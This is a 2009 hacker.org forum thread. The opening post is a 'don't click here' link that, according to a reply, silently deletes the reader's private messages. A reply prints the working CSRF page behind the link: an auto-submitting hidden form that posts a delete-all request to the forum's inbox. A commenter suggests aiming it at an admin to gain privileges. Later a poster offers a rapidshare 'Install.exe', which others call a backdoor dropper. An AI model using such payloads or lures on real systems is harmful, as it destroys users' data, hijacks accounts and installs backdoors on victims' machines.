Danger - don't read this
Posted: Wed Mar 11, 2009 2:46 pm
I've warned you!
Don't click here: http://bit.ly/dontclickme
Page 1 of 1
I've warned you!
Don't click here: http://bit.ly/dontclickme
Re: Danger - don't read this
Posted: Wed Mar 11, 2009 3:33 pm
It deletes all messages in your inbox...
Code: Select all
<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>
<form action="http://www.hacker.org/forum/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">
</body>
</html>
Posted: Wed Mar 11, 2009 6:39 pm
nice POC. if you make a link like this for an admin you can get yourself admined :P
Posted: Wed Mar 11, 2009 9:12 pm
adum has just fixed that issue, so you may now safely click the link - and nothing will happen to your PM's !
Posted: Fri Mar 20, 2009 12:05 am
What was the point of posting this anyways??
Posted: Fri Mar 20, 2009 2:34 pm
Right, seems quite an unsafe way of exposing a vulnerability. Anyways, is this a general phpBB issue? I never liked that piece of s..oftware anyways.
LoL
Posted: Sat Mar 21, 2009 9:45 pm
This is the program he used to generate the code>>>
http://rapidshare.com/files/211946099/Install.exe.html
http://rapidshare.com/files/211946099/Install.exe.html
Re: LoL
Posted: Sun Mar 22, 2009 2:16 am
don't go cracker on us tomtomtomtom.tomtomtomtom wrote:This is the program he used to generate the code>>>
http://rapidshare.com/files/211946099/Install.exe.html
Install.exe.html?
INSTALL.EXE? no program name? nothing? that on top of the fact that there's about a 1 in (insert number of rapidshare files here) chance that you'd EVER find that. Tell me the program name, smart guy. :3
Posted: Sun Mar 22, 2009 5:06 am
BackDoor.VB.DMS.dropper
Posted: Sun Mar 22, 2009 5:27 am
sweet!
Posted: Sun Mar 22, 2009 5:50 am
Gnarly
Posted: Sun Mar 22, 2009 11:19 pm
and who called it? :3plope0726 wrote:BackDoor.VB.DMS.dropper
and who are these 2 new guys saying its sweet? probably mule accounts of his...
sorry, mule is a term used in MMO's. Too used to it :3
Posted: Mon Mar 23, 2009 12:17 am
[quote="PaRaDoX"][quote="plope0726"]BackDoor.VB.DMS.dropper[/quote]
and who called it? :3
and who are these 2 new guys saying its sweet? probably mule accounts of his...
sorry, mule is a term used in MMO's. Too used to it :3[/quote]
You did
Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... 
and who called it? :3
and who are these 2 new guys saying its sweet? probably mule accounts of his...
sorry, mule is a term used in MMO's. Too used to it :3[/quote]
You did
Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... Posted: Thu Mar 26, 2009 1:44 am
plope0726 wrote:You didPaRaDoX wrote:and who called it? :3plope0726 wrote:BackDoor.VB.DMS.dropper
and who are these 2 new guys saying its sweet? probably mule accounts of his...
sorry, mule is a term used in MMO's. Too used to it :3
.....unless they are mules.